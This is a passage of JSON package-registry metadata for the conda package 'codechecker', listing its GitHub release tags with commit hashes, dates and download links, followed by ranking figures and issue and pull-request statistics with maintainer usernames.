ha":"267e9cb77e55f77a457b3b1f2f3660f35564939e","kind":"commit","published_at":"2021-01-08T11:03:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1/manifests"},{"name":"v6.15.0","sha":"131861b7e94298f58cad883a533814573b89a0f3","kind":"commit","published_at":"2020-11-12T23:55:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0/manifests"},{"name":"v6.14.0","sha":"644f900e80e2053cdb7d69eee3dfa34e622c185c","kind":"commit","published_at":"2020-09-11T13:12:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.14.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0/manifests"},{"name":"v6.13.0","sha":"17678b103375a9dbff6e69328d0996d54de78ef3","kind":"commit","published_at":"2020-07-10T13:24:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.13.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0/manifests"},{"name":"v6.12.1","sha":"be4c6ac31f125be8432589ea9e9e5b1bbd838d22","kind":"commit","published_at":"2020-06-12T11:46:39.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1/manifests"},{"name":"v6.12.0","sha":"ecccb6308db0a16d80bb6273280d482576d28d8b","kind":"commit","published_at":"2020-05-14T17:59:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0/manifests"},{"name":"v6.11.1","sha":"9bb0047368707a18efaca3a207dc8227c8e19b9e","kind":"commit","published_at":"2020-02-12T23:12:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1/manifests"},{"name":"v6.11.0","sha":"65a042f1ad0dec5581d54cb13396d201a573c0b2","kind":"commit","published_at":"2019-12-12T16:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0/manifests"},{"name":"v6.10.1","sha":"d3928e30d25bd10da977d2d1119f300a30179cc0","kind":"commit","published_at":"2019-10-09T14:33:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1/manifests"},{"name":"v6.10.0","sha":"28cb13900c6e2ada55f469d267e05cab9844a97a","kind":"commit","published_at":"2019-07-11T18:00:44.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0/manifests"},{"name":"v6.9.1","sha":"197579e082c64e42043683b4e14ae2228a5c7d89","kind":"commit","published_at":"2019-04-11T13:22:48.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1/manifests"},{"name":"v6.9.0","sha":"03351d259b47a57d0c0daebf2a2b00149ea37298","kind":"commit","published_at":"2019-02-08T14:26:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0/manifests"},{"name":"v6.8.1","sha":"e8b4c6172b45428f997c0e7f37891e11ae312180","kind":"commit","published_at":"2018-11-08T10:10:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1/manifests"},{"name":"v6.8.0","sha":"2bd99a0b24b4b62fb85992f94ab682c4a9ddc362","kind":"commit","published_at":"2018-09-11T11:33:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0/manifests"},{"name":"v6.7.1","sha":"968bd5ae5f82fe2d5d329005a2e7748c1200d8fc","kind":"commit","published_at":"2018-06-08T09:08:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1/manifests"},{"name":"v6.7.0","sha":"9c4f1c514517af66c92e8b73332a79f2adf69e73","kind":"commit","published_at":"2018-05-16T11:22:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0/manifests"},{"name":"v6.6.0","sha":"d507de883bd29bdc8221e8ecb74c9d1117ad5867","kind":"commit","published_at":"2018-03-22T14:30:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0/manifests"},{"name":"v6.5.1","sha":"fd2df3820f3985e4b2e2b576d0cc9aa9c2474348","kind":"commit","published_at":"2018-02-22T16:01:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1/manifests"},{"name":"v6.5","sha":"7370d62dccac3c5ce2771764fa92b8e3bc22bbac","kind":"commit","published_at":"2018-02-07T12:01:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5/manifests"},{"name":"v6.4","sha":"32ea3cf57eb71255307c065ff8bac6513e0064b9","kind":"commit","published_at":"2018-01-11T14:04:15.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4/manifests"},{"name":"v6.3","sha":"44c2a7740fa27b9459c40daea2b7836b1c8ca250","kind":"commit","published_at":"2017-12-11T19:02:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3/manifests"},{"name":"v6.2.1","sha":"174807916c5df8cd80bb08d5f11ac6a49f9e91bf","kind":"commit","published_at":"2017-11-27T16:06:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1/manifests"},{"name":"v6.2","sha":"b5ef68f0049ce63a767d82ca602b470ad3f5e758","kind":"commit","published_at":"2017-11-15T16:54:58.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2/manifests"},{"name":"v6.1.1","sha":"64e128e075defb1e05002ecef481ca120d79fb84","kind":"commit","published_at":"2017-10-27T14:25:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1/manifests"},{"name":"v6.1","sha":"ab67d2626297da41ec42afa2cbb404538069db1f","kind":"commit","published_at":"2017-10-13T16:22:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1/manifests"},{"name":"v6.0.1","sha":"f7506fde033e6f57af6612847b447af69077ac8c","kind":"commit","published_at":"2017-10-02T09:28:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1/manifests"},{"name":"v6.0","sha":"666452b9ab4fc97438ac2c45166def3bd3269971","kind":"commit","published_at":"2017-09-18T22:19:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0/manifests"},{"name":"v5.10","sha":"927979c4eee9f53f5fec79fba3e1be7c606c599c","kind":"commit","published_at":"2017-08-09T18:31:55.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.10","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10/manifests"},{"name":"v5.9","sha":"ebb1d0330efa1da5712a01c92e0c004aba46bd05","kind":"commit","published_at":"2017-07-14T14:09:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.9","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9/manifests"},{"name":"v5.8","sha":"e8f7d02769a613286c1749d70495ba6a41f7427c","kind":"commit","published_at":"2017-07-07T12:32:03.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.8","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8/manifests"},{"name":"v5.7.1","sha":"2eca2df6a9d0f5482c1783f063568de5c1ddbe5d","kind":"commit","published_at":"2017-02-09T17:03:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1/manifests"},{"name":"v5.7","sha":"1ce7ccbefb1212726331a1fcde4dd37a17cdaccf","kind":"commit","published_at":"2017-01-11T17:17:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7/manifests"},{"name":"v5.6","sha":"e1b0157ad9f61a946fa0343708be7336cf1a6314","kind":"commit","published_at":"2016-11-15T09:20:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6/manifests"},{"name":"v5.5","sha":"c7bafa16fdaf48ed7a890aea002ae0275e32d963","kind":"commit","published_at":"2016-08-30T10:06:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5/manifests"},{"name":"v5.4","sha":"bcc8c663294739c3946e6cd147e0f98fa0e2d57f","kind":"commit","published_at":"2016-08-05T10:43:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4/manifests"},{"name":"v5.3","sha":"902c6cf189d747faae5684c4f3f790224dde5eab","kind":"commit","published_at":"2016-04-14T15:55:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3/manifests"},{"name":"5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2/manifests"},{"name":"v5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2/manifests"},{"name":"v5.1","sha":"ab6c82930bde31e558ca20790df7a701e04ed7e6","kind":"commit","published_at":"2015-11-26T13:16:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1/manifests"},{"name":"v5.0","sha":"5bb577a9c03bbe78317a4a57d20c0c1e3a3064d0","kind":"commit","published_at":"2015-11-11T10:02:45.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0/manifests"},{"name":"v4.0","sha":"72075b4a94b791cee9f434ea5d06c702e2fce16d","kind":"commit","published_at":"2015-08-26T13:33:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v4.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0/manifests"}]},"repo_metadata_updated_at":"2025-08-19T18:14:34.587Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":34.025455452957324,"dependent_packages_count":51.17544297479411,"stargazers_count":8.82455702520589,"forks_count":9.862740204641876,"average":25.9720489143998},"purl":"pkg:conda/codechecker","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/conda/codechecker","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/conda/codechecker","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/conda/codechecker/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-08-10T06:58:09.855Z","issues_count":289,"pull_requests_count":576,"avg_time_to_close_issue":24131448.2,"avg_time_to_close_pull_request":3397393.635220126,"issues_closed_count":110,"pull_requests_closed_count":477,"pull_request_authors_count":72,"issue_authors_count":116,"avg_comments_per_issue":1.6678200692041523,"avg_comments_per_pull_request":0.7586805555555556,"merged_pull_requests_count":412,"bot_issues_count":0,"bot_pull_requests_count":59,"past_year_issues_count":89,"past_year_pull_requests_count":224,"past_year_avg_time_to_close_issue":3579611.04,"past_year_avg_time_to_close_pull_request":1482183.1176470588,"past_year_issues_closed_count":25,"past_year_pull_requests_closed_count":170,"past_year_pull_request_authors_count":37,"past_year_issue_authors_count":52,"past_year_avg_comments_per_issue":1.0337078651685394,"past_year_avg_comments_per_pull_request":0.5491071428571429,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/issues","maintainers":[{"login":"dkrupp","count":73,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"vodorok","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vodorok"},{"login":"Szelethus","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":49,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"},{"login":"cservakt","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"gamesh411","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"noraz31","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"feyruzb","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"stt08","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"csordasmarton","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/csordasmarton"}],"active_maintainers":[{"login":"dkrupp","